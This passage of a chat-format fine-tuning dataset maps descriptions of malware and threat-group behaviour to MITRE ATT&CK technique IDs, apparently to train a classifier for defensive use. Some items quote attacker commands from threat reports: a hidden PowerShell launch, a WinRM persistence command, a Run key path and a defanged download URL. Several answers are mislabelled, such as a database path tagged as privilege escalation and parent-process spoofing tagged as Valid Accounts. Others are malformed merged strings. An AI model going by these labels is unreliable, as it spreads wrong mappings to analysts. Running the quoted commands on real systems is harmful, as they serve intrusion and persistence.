- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GRIFFON has used a reconnaissance module that can be used to retrieve the date and time of the system."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink can download files via HTTP and HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi executes received commands with wmic.exe (for WMI commands)."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of executing commands and spawning a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti can retrieve the ARP cache from the local system by using the \"GetIpNetTable()\" API call and check to ensure IP addresses it connects to are for local, non-Internet, systems."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Capture current screen (screenshot) and save screenshot as a JPEG to \"C:\\ProgramData\\tsc\". The contents of the file are subsequently read and sent to the C2. Code to capture a screenshot as bitmap and save to file"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. Once opened, Excel will retrieve whatever object is at the URL inside the file. These files have most recently been found in use by criminals to deliver commodity RATs such as Flawed Ammyy. In DarkHydrus's case, the preferred payload retrieved in their previous attacks were exclusively open-source legitimate tools which they abuse for malicious purposes, such as Meterpreter and Cobalt Strike. However, in this instance, it appears that this group used a custom PowerShell based payload that we call RogueRobin"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the most noticeable differences is the use of encryption over the entire TCP segment, as a way for it to evade detection. Additionally, this seems to be a lightweight version of Gh0stRAT, as it only has 12 commands, compared to the 73 for a full Gh0stRAT sample; 3 of those commands are undocumented. Also, unlike most samples that I receive on my honeypot, this sample did not start as a DLL that communicates to a distribution server in order to download the stage1"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel', 'T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload will construct a message that has the following structure that it will then send to the C2: byed The message above is sent via a simple HTTPS/HTTP POST request to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There is a variant of that uses a PowerShell script instead of the traditional PE form."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of \"net stop\"."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Sharpshooter, the threat actors used a VBA macro to execute a simple downloader that installed Rising Sun."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX can be configured to use HTTP for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download files off the target system to send back to the server."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The downloaded document template contains the malicious macro codes, which executes a VBScript (VBS)."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then, it will launch Dec.exe using PowerShell with the command “ cmd.exe /c powershell - WindowStyle Hidden Start-Process Dec.exe - WindowStyle maximized ”."
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Raindrop decrypted its Cobalt Strike payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron is capable of executing commands via cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant"
- },
- {
- "role": "assistant",
- "content": "T1036.007 - Masquerading: Double File Extension"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla surveys a system upon check-in to discover operating system configuration details using the \"systeminfo\" and \"set\" commands."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain the victim user name."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elderwood has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actors used the taskkill command to probably disable security features. CISA was unable to determine which application was associated with the Process ID."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "runs cmd.exe /c and sends the output to its C2."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The database is located in the “/usr/lib/cva-ssys/My_BD” folder (“~/.local/cva-ssys/My_BD”—if the Trojan does not have root privileges)"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has used `cmd.exe` and `.bat` scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses to execute a payload or commands on a remote host."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Scarlet Mimic has used the left-to-right override character in self-extracting RAR archive spearphishing attachment file names."
- },
- {
- "role": "assistant",
- "content": "T1036.002 - Right-to-Left Override"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address."
- },
- {
- "role": "assistant",
- "content": "T1565.002 - Transmitted Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some samples contain a publicly available Web browser password recovery tool."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This release adds features to spawn processes with an alternate parent process. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. For example, if I’m in a user context, I might set explorer.exe as my parent with something plausible (e.g, iexplore.exe) for my temporary processes. If I’m in a SYSTEM context, I might use services.exe as my parent process and ask Beacon to use svchost.exe for its temporary processes. Beacon’s runu command runs an arbitrary command as a child of another parent. These commands offer means to spawn a payload, in another desktop session, without remote process injection. The Resource Kit . Cobalt Strike 3.8’s Resource Kit finally gives you a way to change Cobalt Strike’s built-in script templates. The Resource Kit is a collection of Cobalt Strike’s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows"
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container. More specifically, it links its local containerized X drive to the host’s C drive"
- },
- {
- "role": "assistant",
- "content": "T1611 - Escape to Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has sent e-mails with malicious links often crafted for specific targets."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has developed malware variants written in Python."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peirates can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3."
- },
- {
- "role": "assistant",
- "content": "T1530 - Data from Cloud Storage Object"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The QUADAGENT backdoors dropped onto the hosts were nearly identical to each other, with the only differences being the command and control server (C2) and randomized obfuscation. We were also able to locate a third delivery package of the QUADAGENT backdoor as reported by ClearSky Cyber Security. In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Regin malware platform can use Windows admin shares to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has used a scheduled task to establish persistence for a keylogger."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADFLICK has compressed data using the aPLib compression library."
- },
- {
- "role": "assistant",
- "content": "T1560.002 - Archive Collected Data: Archive via Library"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has used JavaScript and Node.Js information stealer script that exfiltrates data using the node process."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors enabled WinRM over HTTP/HTTPS as a backup persistence mechanism using the following command: `cscript //nologo \"C:\\Windows\\System32\\winrm.vbs\" set winrm/config/service@{EnableCompatibilityHttpsListener=\"true\"}`."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can check for VMware-related files and DLLs related to sandboxes."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects endpoint information using the systeminfo command."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the first case, attackers create two WMI event filters and two WMI event consumers. The consumers are simply command lines launching base64-encoded PowerShell commands that load a large PowerShell script stored in the Windows registry. Figure 1 shows how the persistence is established"
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can use junk code to hide functions and evade detection."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 uses a module to receive a notification every time a USB mass storage device is inserted into a victim."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed)."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sodinokibi gathers some basic system information and saves it to the registry together with the generated encryption parameters. If the dbg option is not set in the config, the UI language and keyboard layout values are checked, and the malware will simply exit on systems which use one of the following language codes"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Spark can collect the hostname, keyboard layout, and language from the system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "compromised legitimate organizations' websites to create watering holes to compromise victims."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More_eggs has used a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum can collect network information, including the host IP address, DNS, and proxy information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandbox check and anti-virus product enumeration - Dropping payload ‘netmgr.exe’ - Creating a registry key for persistence - Creating a registry key for deletion of the dropper"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet used copies of .lnk shortcuts to propagate through removable media."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task."
- },
- {
- "role": "assistant",
- "content": "T1072 - Software Deployment Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink has maintained persistence by patching legitimate device firmware when it is downloaded, including that of WatchGuard devices."
- },
- {
- "role": "assistant",
- "content": "T1542.002 - Component Firmware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot can download and execute a payload onto a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy is packed for obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic has added persistence to the `HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` Registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SEASHARPEE can execute commands on victims."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OLDBAIT can use SMTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has downloaded additional malware and tools, including through the use of `certutil`, onto a compromised host ."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has deployed a utility script named \"kill.bat\" to disable anti-virus."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
